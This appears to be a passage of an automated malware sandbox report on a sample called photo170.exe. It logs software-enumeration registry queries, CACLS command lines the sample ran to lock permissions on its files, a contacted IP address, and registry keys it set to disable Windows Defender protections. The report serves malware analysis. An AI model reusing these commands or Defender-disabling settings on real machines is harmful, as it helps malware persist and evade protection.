RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:34 a.m.	key_handle: 0x0000028c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW July 24, 2023, 7:35 a.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	CACLS "..\3ec1f323b5" /P "test22:N"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y\|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit
cmdline	CACLS "danke.exe" /P "test22:R" /E
cmdline	cmd /k echo Y\|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y\|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit
cmdline	CACLS "..\3ec1f323b5" /P "test22:R" /E
cmdline	CACLS "danke.exe" /P "test22:N"

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

77.91.68.30:80

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

photo170.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All